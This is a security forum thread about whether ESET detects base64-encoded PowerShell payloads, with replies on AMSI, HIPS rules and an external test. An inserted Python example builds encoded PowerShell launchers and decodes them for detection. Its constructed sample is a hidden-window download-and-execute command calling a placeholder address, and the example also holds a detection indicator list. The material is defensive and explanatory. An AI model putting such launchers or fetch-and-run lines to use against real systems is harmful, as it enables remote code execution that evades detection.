thrilla_killa

Latest ESET products not detecting APT tools


Posted (edited)

Is ESET supposed to detect APT actors or tools? I am testing a framework (simple base64-encoded PowerShell payloads) and none of your products are detecting them. All settings are verified as on.

Edited by Marcos
Case changed

There are several layers that could detect such a threat:
1. Detection by a signature.
2. Web access protection if the PowerShell script is downloaded from the Internet.
3. AMSI scanner upon execution of PowerShell.
4. Advanced memory scanner if the payload is a file that is executed.

The question is if the payload does something really malicious. Please contact samples[at]eset.com and provide details.

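To make the layers above concrete, here is an added example (written for this page; it is not ESET's code and was not posted in the thread) showing what a detection layer such as AMSI or a command-line rule has to do before any signature can match a "simple base64 encoded PowerShell payload": decode the UTF-16LE base64 behind -EncodedCommand, unwrap a nested FromBase64String layer, and only then look for download-and-execute indicators. The launcher builder, the sample command lines, the 203.0.113.5 URL and the indicator list are all constructed for the example.

```python
from __future__ import annotations

import base64
import re

# --- attacker side: how a framework wraps a script into a one-liner launcher ---

def encode_powershell(script: str, hidden: bool = False) -> str:
    """Build the launcher line such frameworks emit.

    -EncodedCommand takes base64 of the script encoded as UTF-16LE (not
    UTF-8), which is why decoding the argument as plain text yields NUL bytes.
    """
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    flags = "-NoProfile" + (" -WindowStyle Hidden" if hidden else "")
    return f"powershell.exe {flags} -EncodedCommand {b64}"

# --- detection side: what AMSI or a log-based rule must do before matching ---

def _is_encoded_flag(token: str) -> bool:
    # PowerShell accepts any unambiguous prefix: -e, -ec, -enc, -EncodedCommand.
    if not token.startswith(("-", "/")):
        return False
    t = token.lstrip("-/").lower()
    return t.startswith("e") and "encodedcommand".startswith(t)

def _b64decode(s: str) -> bytes:
    s += "=" * (-len(s) % 4)  # tolerate stripped padding
    return base64.b64decode(s, validate=True)

def decode_encoded_command(cmdline: str) -> str | None:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or invalid."""
    tokens = cmdline.split()
    for flag, arg in zip(tokens, tokens[1:]):
        if _is_encoded_flag(flag):
            try:
                return _b64decode(arg).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)

def unwrap_layers(script: str, max_depth: int = 5) -> list[str]:
    """Return [outer, inner, ...], decoding FromBase64String('...') literals in turn."""
    layers = [script]
    for _ in range(max_depth):
        m = NESTED_B64.search(layers[-1])
        if not m:
            break
        try:
            raw = _b64decode(m.group(1))
            # UTF-16LE text carries NUL bytes; UTF-8 text does not.
            text = raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break
        layers.append(text)
    return layers

# Constructed, deliberately short indicator lists (not a vendor's rule set).
CONTENT_INDICATORS = {
    "invoke-expression": r"\b(?:iex|invoke-expression)\b",
    "download": r"\.download(?:string|file)\(",
    "webclient": r"\bnet\.webclient\b",
    "nested-base64": r"frombase64string",
}
LAUNCHER_INDICATORS = {"hidden-window": r"-w(?:indowstyle)?\s+hidden\b"}

def indicators(text: str, patterns: dict) -> list[str]:
    return [name for name, pat in patterns.items() if re.search(pat, text, re.I)]

def analyze(cmdline: str) -> dict:
    """Decode every layer of a PowerShell command line and collect indicators."""
    outer = decode_encoded_command(cmdline)
    layers = unwrap_layers(outer if outer is not None else cmdline)
    found = set(indicators(cmdline, LAUNCHER_INDICATORS))
    for layer in layers:  # the launcher's base64 blob itself is never content-scanned
        found.update(indicators(layer, CONTENT_INDICATORS))
    return {"encoded": outer is not None, "layers": layers, "indicators": sorted(found)}

# Constructed samples (not from the thread). The "payload" only references a
# TEST-NET address and is never executed by this script.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"
INNER_B64 = base64.b64encode(INNER.encode("utf-8")).decode("ascii")
STAGED = encode_powershell(
    f"IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{INNER_B64}')))",
    hidden=True,
)
BENIGN = encode_powershell("Get-Service | Where-Object Status -eq 'Running' | Measure-Object")
PLAIN = "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"

if __name__ == "__main__":
    for name, line in (("STAGED", STAGED), ("BENIGN", BENIGN), ("PLAIN", PLAIN)):
        r = analyze(line)
        print(f"{name}: encoded={r['encoded']} layers={len(r['layers'])} indicators={r['indicators']}")
        for i, layer in enumerate(r["layers"]):
            print(f"  layer {i}: {layer[:80]}")
```

The point for the original question: a signature written against the launcher line sees only a base64 blob that changes with every payload, while the AMSI layer sees the decoded script at execution time, so base64 alone is not obfuscation. Real obfuscation (string splitting, format operators, compression) defeats the fixed indicator list here, which is exactly the class of script most products in the thread's linked test also struggled with.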

Unfortunately, I am not providing my source code at this time. I just wanted to advise that PowerShell, which is readily available on Windows systems, can easily bypass the ESET systems and allow commands to be run from remote agents with ease.

11 minutes ago, thrilla_killa said:

Unfortunately, I am not providing my source code at this time. I just wanted to advise that PowerShell, which is readily available on Windows systems, can easily bypass the ESET systems and allow commands to be run from remote agents with ease.

Unfortunately, without proof we cannot comment on it. Of course, no antivirus detects 100% of all threats, especially when it comes to scripts. And blocking all PowerShell scripts just because they could be misused is not a good solution either.

Posted (edited)
On 4/19/2018 at 1:30 PM, thrilla_killa said:

I am testing a framework (simple base64-encoded PowerShell payloads) and none of your products are detecting them.

For reference, you might want to refer to this ad hoc AV lab test done last summer by Malware Research Group using Win 10: https://www.mrg-effitas.com/current-state-of-malicious-powershell-script-blocking/ . ESET was one of the top scorers, only having issues with highly obfuscated scripts, as did most other tested AV products.

On non-Win 10 OS versions, packed, encrypted, and obfuscated scripts pose a real danger in that there is no way to examine those scripts until they load into memory and begin execution. If you aren't using Win 10, or for additional protection if you are, I recommend you create the HIPS rules noted in this ESET KB article, especially the PowerShell-related rules: https://support.eset.com/kb6119/ . These rules would only be problematic in an enterprise environment where custom PowerShell scripts are deployed.

Edited by itman